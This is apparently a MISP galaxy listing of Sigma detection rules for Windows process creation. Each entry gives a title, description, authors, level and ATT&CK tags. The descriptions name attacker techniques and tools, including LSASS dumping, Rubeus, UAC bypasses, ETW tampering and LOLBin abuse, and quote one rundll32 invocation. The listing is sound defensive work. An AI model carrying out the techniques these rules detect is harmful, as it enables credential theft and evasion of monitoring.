tags ['attack.defense_evasion', 'attack.t1218.010']

Chromium Browser Instance Executed With Custom Extension

Detects a Chromium-based browser process started with the 'load-extension' flag to launch an instance with a custom extension

Internal MISP references

UUID 88d6e60c-759d-4ac1-a447-c0f1466c2d21 which can be used as unique global reference for Chromium Browser Instance Executed With Custom Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aedan Russell, frack113, X__Junior (Nextron Systems)
creation_date 2022/06/19
falsepositive ['Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert']
filename proc_creation_win_browsers_chromium_load_extension.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1176']

Browser Execution In Headless Mode

Detects execution of a Chromium-based browser in headless mode

Internal MISP references

UUID ef9dcfed-690c-4c5d-a9d1-482cd422225c which can be used as unique global reference for Browser Execution In Headless Mode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/12
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_exec.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Potentially Suspicious Child Process Of WinRAR.EXE

Detects potentially suspicious child processes of WinRAR.exe.

Internal MISP references

UUID 146aace8-9bd6-42ba-be7a-0070d8027b76 which can be used as unique global reference for Potentially Suspicious Child Process Of WinRAR.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/31
falsepositive ['Unknown']
filename proc_creation_win_winrar_susp_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1203']

Taskmgr as LOCAL_SYSTEM

Detects the creation of a taskmgr.exe process in the context of LOCAL_SYSTEM

Internal MISP references

UUID 9fff585c-c33e-4a86-b3cd-39312079a65f which can be used as unique global reference for Taskmgr as LOCAL_SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/18
falsepositive ['Unknown']
filename proc_creation_win_taskmgr_localsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036']

Suspicious Execution Of PDQDeployRunner

Detects suspicious execution of "PDQDeployRunner", which is the part of the PDQDeploy service stack responsible for executing commands and packages on remote machines

Internal MISP references

UUID 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 which can be used as unique global reference for Suspicious Execution Of PDQDeployRunner in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the PDQDeploy tool to execute these commands']
filename proc_creation_win_pdqdeploy_runner_susp_children.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

ETW Logging Tamper In .NET Processes

Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.

Internal MISP references

UUID 41421f44-58f9-455d-838a-c398859841d4 which can be used as unique global reference for ETW Logging Tamper In .NET Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020/05/02
falsepositive ['Unlikely']
filename proc_creation_win_susp_etw_modification_cmdline.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']

Security Tools Keyword Lookup Via Findstr.EXE

Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results. This detection focuses on the keywords that the attacker might use as a filter.

Internal MISP references

UUID 4fe074b4-b833-4081-8f24-7dcfeca72b42 which can be used as unique global reference for Security Tools Keyword Lookup Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), frack113
creation_date 2023/10/20
falsepositive ['Unknown']
filename proc_creation_win_findstr_security_keyword_lookup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1518.001']

Suspicious Sigverif Execution

Detects the execution of the sigverif binary as a parent process, which could indicate it being used as a LOLBIN to proxy execution

Internal MISP references

UUID 7d4aaec2-08ed-4430-8b96-28420e030e04 which can be used as unique global reference for Suspicious Sigverif Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/19
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sigverif.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1216']

Suspicious Schtasks Schedule Types

Detects scheduled task creation or modification with a suspicious schedule type

Internal MISP references

UUID 24c8392b-aa3c-46b7-a545-43f71657fe98 which can be used as unique global reference for Suspicious Schtasks Schedule Types in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/09
falsepositive ['Legitimate processes that run at logon. Filter according to your environment']
filename proc_creation_win_schtasks_schedule_type.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1053.005']

ConvertTo-SecureString Cmdlet Usage Via CommandLine

Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity

Internal MISP references

UUID 74403157-20f5-415d-89a7-c505779585cf which can be used as unique global reference for ConvertTo-SecureString Cmdlet Usage Via CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
creation_date 2020/10/11
falsepositive ['Legitimate use to pass password to different powershell commands']
filename proc_creation_win_powershell_cmdline_convertto_securestring.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']

Sysinternals PsSuspend Execution

Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes

Internal MISP references

UUID 48bbc537-b652-4b4e-bd1d-281172df448f which can be used as unique global reference for Sysinternals PsSuspend Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/23
falsepositive ['Unknown']
filename proc_creation_win_sysinternals_pssuspend_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.persistence', 'attack.t1543.003']

Uncommon Child Process Of AddinUtil.EXE

Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe), which could be a sign of abuse of the binary to proxy execution via a custom Addins.Store payload.

Internal MISP references

UUID b5746143-59d6-4603-8d06-acbd60e166ee which can be used as unique global reference for Uncommon Child Process Of AddinUtil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
creation_date 2023/09/18
falsepositive ['Unknown']
filename proc_creation_win_addinutil_uncommon_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Suspicious Diantz Download and Compress Into a CAB File

Detects use of diantz to download a remote file and compress it into a CAB file stored on the local machine.

Internal MISP references

UUID 185d7418-f250-42d0-b72e-0c8b70661e93 which can be used as unique global reference for Suspicious Diantz Download and Compress Into a CAB File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/26
falsepositive ['Unknown']
filename proc_creation_win_lolbin_diantz_remote_cab.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Use NTFS Short Name in Command Line

Detects use of Windows 8.3 short names, which could be used as a method to avoid command-line detection

Internal MISP references

UUID dd6b39d9-d9be-4a3b-8fe0-fe3c6a5c1795 which can be used as unique global reference for Use NTFS Short Name in Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_use_cli.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

HackTool - HandleKatz LSASS Dumper Execution

Detects the use of HandleKatz, a tool that demonstrates the use of cloned handles to LSASS in order to create an obfuscated memory dump of that process

Internal MISP references

UUID ca621ba5-54ab-4035-9942-d378e6fcde3c which can be used as unique global reference for HackTool - HandleKatz LSASS Dumper Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unknown']
filename proc_creation_win_hktl_handlekatz.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Suspicious Encoded PowerShell Command Line

Detects suspicious PowerShell process starts with base64 encoded commands (e.g. Emotet)

Internal MISP references

UUID ca2092a1-c273-4878-9b4b-0d60115bf5ea which can be used as unique global reference for Suspicious Encoded PowerShell Command Line in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community
creation_date 2018/09/03
falsepositive No established falsepositives
filename proc_creation_win_powershell_base64_encoded_cmd.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Remote Access Tool - ScreenConnect Remote Command Execution

Detects the execution of a system command via the ScreenConnect RMM service.

Internal MISP references

UUID b1f73849-6329-4069-bc8f-78a604bb8b23 which can be used as unique global reference for Remote Access Tool - ScreenConnect Remote Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ali Alwashali
creation_date 2023/10/10
falsepositive ['Legitimate use of ScreenConnect. Disable this rule if ScreenConnect is heavily used.']
filename proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

PUA - Fast Reverse Proxy (FRP) Execution

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

Internal MISP references

UUID 32410e29-5f94-4568-b6a3-d91a8adad863 which can be used as unique global reference for PUA - Fast Reverse Proxy (FRP) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Florian Roth
creation_date 2022/09/02
falsepositive ['Legitimate use']
filename proc_creation_win_pua_frp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']

Use Of The SFTP.EXE Binary As A LOLBIN

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

Internal MISP references

UUID a85ffc3a-e8fd-4040-93bf-78aff284d801 which can be used as unique global reference for Use Of The SFTP.EXE Binary As A LOLBIN in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/10
falsepositive ['Unknown']
filename proc_creation_win_lolbin_sftp.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

UAC Bypass Using IDiagnostic Profile

Detects the "IDiagnosticProfileUAC" UAC bypass technique

Internal MISP references

UUID 4cbef972-f347-4170-b62a-8253f6168e6d which can be used as unique global reference for UAC Bypass Using IDiagnostic Profile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/03
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_idiagnostic_profile.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

HackTool - RedMimicry Winnti Playbook Execution

Detects actions caused by the RedMimicry Winnti playbook, an automated breach emulation utility

Internal MISP references

UUID 95022b85-ff2a-49fa-939a-d7b8f56eeb9b which can be used as unique global reference for HackTool - RedMimicry Winnti Playbook Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename proc_creation_win_hktl_redmimicry_winnti_playbook.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1106', 'attack.t1059.003', 'attack.t1218.011']

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

Internal MISP references

UUID 6c8fbee5-dee8-49bc-851d-c3142d02aa47 which can be used as unique global reference for Allow Service Access Using Security Descriptor Tampering Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_sc_sdset_allow_service_changes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003']

Indirect Command Execution From Script File Via Bash.EXE

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.

Internal MISP references

UUID 2d22a514-e024-4428-9dba-41505bd63a5b which can be used as unique global reference for Indirect Command Execution From Script File Via Bash.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/15
falsepositive ['Unknown']
filename proc_creation_win_bash_file_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Wscript Shell Run In CommandLine

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command line, which could indicate suspicious activity

Internal MISP references

UUID 2c28c248-7f50-417a-9186-a85b223010ee which can be used as unique global reference for Wscript Shell Run In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/31
falsepositive ['Inline scripting can be used by some rare third party applications or administrators. Investigate and apply additional filters accordingly']
filename proc_creation_win_mshta_inline_vbscript.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']

Conhost.exe CommandLine Path Traversal

Detects the usage of path traversal in conhost.exe command lines, indicating possible command/argument confusion or hijacking.

Internal MISP references

UUID ee5e119b-1f75-4b34-add8-3be976961e39 which can be used as unique global reference for Conhost.exe CommandLine Path Traversal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/14
falsepositive ['Unlikely']
filename proc_creation_win_conhost_path_traversal.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003']

PowerShell Base64 Encoded Invoke Keyword

Detects UTF-8 and UTF-16 Base64 encoded PowerShell 'Invoke-' calls.

Internal MISP references

UUID 6385697e-9f1b-40bd-8817-f4a91f40508e which can be used as unique global reference for PowerShell Base64 Encoded Invoke Keyword in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t
creation_date 2022/05/20
falsepositive ['Unknown']
filename proc_creation_win_powershell_base64_invoke.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1027']

Renamed AutoHotkey.EXE Execution

Detects execution of a renamed autohotkey.exe binary based on PE metadata fields

Internal MISP references

UUID 0f16d9cf-0616-45c8-8fad-becc11b5a41c which can be used as unique global reference for Renamed AutoHotkey.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali
creation_date 2023/02/07
falsepositive ['Unknown']
filename proc_creation_win_renamed_autohotkey.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Detection of PowerShell Execution via Sqlps.exe

This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with MSSQL Server. Script blocks are not logged in this case, so this utility can be used to bypass protection mechanisms that rely on the analysis of those logs.

Internal MISP references

UUID 0152550d-3a26-4efd-9f0e-54a0b28ae2f3 which can be used as unique global reference for Detection of PowerShell Execution via Sqlps.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Agro (@agro_sev) oscd.community
creation_date 2020/10/10
falsepositive ['Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action.']
filename proc_creation_win_mssql_sqlps_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.defense_evasion', 'attack.t1127']

Suspicious Execution From Outlook Temporary Folder

Detects a suspicious program execution from the Outlook temp folder.

Internal MISP references

UUID a018fdc3-46a3-44e5-9afb-2cd4af1d4b39 which can be used as unique global reference for Suspicious Execution From Outlook Temporary Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/01
falsepositive ['Unknown']
filename proc_creation_win_office_outlook_execution_from_temp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']

Stop Windows Service Via Net.EXE

Detects the stopping of a Windows service via the "net" utility.

Internal MISP references

UUID 88872991-7445-4a22-90b2-a3adadb0e827 which can be used as unique global reference for Stop Windows Service Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/05
falsepositive ["There are many legitimate reasons to stop a service. This rule isn't looking for any suspicious behaviour in particular. Filter legitimate activity accordingly"]
filename proc_creation_win_net_stop_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1489']

Renamed Jusched.EXE Execution

Detects the execution of a renamed "jusched.exe", as seen used by the Cobalt group.

Internal MISP references

UUID edd8a48c-1b9f-4ba1-83aa-490338cd1ccb which can be used as unique global reference for Renamed Jusched.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Swisscom
creation_date 2019/06/04
falsepositive ['Unknown']
filename proc_creation_win_renamed_jusched.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1036.003']

PUA - AdvancedRun Execution

Detects the execution of AdvancedRun utility

Internal MISP references

UUID d2b749ee-4225-417e-b20e-a8d2193cbb84 which can be used as unique global reference for PUA - AdvancedRun Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/20
falsepositive ['Unknown']
filename proc_creation_win_pua_advancedrun.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1564.003', 'attack.t1134.002', 'attack.t1059.003']

Uninstall Sysinternals Sysmon

Detects the removal of Sysmon, which could be a potential attempt at defense evasion

Internal MISP references

UUID 6a5f68d1-c4b5-46b9-94ee-5324892ea939 which can be used as unique global reference for Uninstall Sysinternals Sysmon in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/12
falsepositive ['Legitimate administrators might use this command to remove Sysmon for debugging purposes']
filename proc_creation_win_sysinternals_sysmon_uninstall.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']

UAC Bypass Using Windows Media Player - Process

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

Internal MISP references

UUID 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 which can be used as unique global reference for UAC Bypass Using Windows Media Player - Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_wmp.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

HackTool - Rubeus Execution

Detects the execution of the hacktool Rubeus via PE information or command line parameters.

Internal MISP references

UUID 7ec2c172-dceb-4c10-92c9-87c1881b7e18 which can be used as unique global reference for HackTool - Rubeus Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/12/19
falsepositive ['Unlikely']
filename proc_creation_win_hktl_rubeus.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']

Gzip Archive Decode Via PowerShell

Detects attempts of decoding encoded Gzip archives via PowerShell.

Internal MISP references

UUID 98767d61-b2e8-4d71-b661-e36783ee24c1 which can be used as unique global reference for Gzip Archive Decode Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions']
filename proc_creation_win_powershell_decode_gzip.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']

Group Membership Reconnaissance Via Whoami.EXE

Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.

Internal MISP references

UUID bd8b828d-0dca-48e1-8a63-8a58ecf2644f which can be used as unique global reference for Group Membership Reconnaissance Via Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/02/28
falsepositive ['Unknown']
filename proc_creation_win_whoami_groups_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033']

Suspicious Csi.exe Usage

Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a command line parameter. An early version of this utility, provided with the Microsoft "Roslyn" Community Technology Preview, was named 'rcsi.exe'.

Internal MISP references

UUID 40b95d31-1afc-469e-8d34-9a3a667d058e which can be used as unique global reference for Suspicious Csi.exe Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/17
falsepositive ['Legitimate usage by software developers']
filename proc_creation_win_csi_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1072', 'attack.defense_evasion', 'attack.t1218']

Suspicious Git Clone

Detects execution of "git" in order to clone a remote repository whose URL contains suspicious keywords.

Internal MISP references

UUID aef9d1f1-7396-4e92-a927-4567c7a495c1 which can be used as unique global reference for Suspicious Git Clone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/03
falsepositive ['Unknown']
filename proc_creation_win_git_susp_clone.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1593.003']

HackTool - SharpImpersonation Execution

Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively.

Internal MISP references

UUID f89b08d0-77ad-4728-817b-9b16c5a69c7a which can be used as unique global reference for HackTool - SharpImpersonation Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/27
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharp_impersonation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1134.001', 'attack.t1134.003']

Rundll32 InstallScreenSaver Execution

An attacker may execute an application as an SCR file using "rundll32.exe desk.cpl,InstallScreenSaver".

Internal MISP references

UUID 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 which can be used as unique global reference for Rundll32 InstallScreenSaver Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
creation_date 2022/04/28
falsepositive ['Legitimate installation of a new screensaver']
filename proc_creation_win_rundll32_installscreensaver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218.011', 'attack.defense_evasion']

Service StartupType Change Via Sc.EXE

Detects the use of "sc.exe" to change the startup type of a service to "disabled" or "demand".

Internal MISP references

UUID 85c312b7-f44d-4a51-a024-d671c40b49fc which can be used as unique global reference for Service StartupType Change Via Sc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/01
falsepositive ['False positives may occur with troubleshooting scripts']
filename proc_creation_win_sc_disable_service.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1562.001']

Windows Hotfix Updates Reconnaissance Via Wmic.EXE

Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts.

Internal MISP references

UUID dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45 which can be used as unique global reference for Windows Hotfix Updates Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_hotfix.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']

Potentially Suspicious WebDAV LNK Execution

Detects possible execution via LNK file accessed on a WebDAV server.

Internal MISP references

UUID 1412aa78-a24c-4abd-83df-767dfb2c5bbe which can be used as unique global reference for Potentially Suspicious WebDAV LNK Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2023/08/21
falsepositive ['Unknown']
filename proc_creation_win_webdav_lnk_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1204']

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE. The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\".

Internal MISP references

UUID 180c7c5c-d64b-4a63-86e9-68910451bc8b which can be used as unique global reference for Potential File Download Via MS-AppInstaller Protocol Handler in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
creation_date 2023/11/09
falsepositive ['Unknown']
filename proc_creation_win_susp_ms_appinstaller_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218']

Suspicious FromBase64String Usage On Gzip Archive - Process Creation

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

Internal MISP references

UUID d75d6b6b-adb9-48f7-824b-ac2e786efe1f which can be used as unique global reference for Suspicious FromBase64String Usage On Gzip Archive - Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename proc_creation_win_powershell_frombase64string_archive.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1132.001']

UAC Bypass Tools Using ComputerDefaults

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

Internal MISP references

UUID 3c05e90d-7eba-4324-9972-5d7f711a60a8 which can be used as unique global reference for UAC Bypass Tools Using ComputerDefaults in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/31
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_computerdefaults.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Password Protected Compressed File Extraction Via 7Zip

Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.

Internal MISP references

UUID b717b8fd-6467-4d7d-b3d3-27f9a463af77 which can be used as unique global reference for Password Protected Compressed File Extraction Via 7Zip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/10
falsepositive ['Legitimate activity is expected since extracting files with a password can be common in some environment.']
filename proc_creation_win_7zip_password_extraction.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.t1560.001']

HackTool - Koadic Execution

Detects command line parameters used by the Koadic hack tool.

Internal MISP references

UUID 5cddf373-ef00-4112-ad72-960ac29bac34 which can be used as unique global reference for HackTool - Koadic Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author wagga, Jonhnathan Ribeiro, oscd.community
creation_date 2020/01/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_koadic.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.007']

Always Install Elevated MSI Spawned Cmd And Powershell

Detects the Windows Installer service (msiexec.exe) spawning "cmd" or "powershell".

Internal MISP references

UUID 1e53dd56-8d83-4eb4-a43e-b790a05510aa which can be used as unique global reference for Always Install Elevated MSI Spawned Cmd And Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
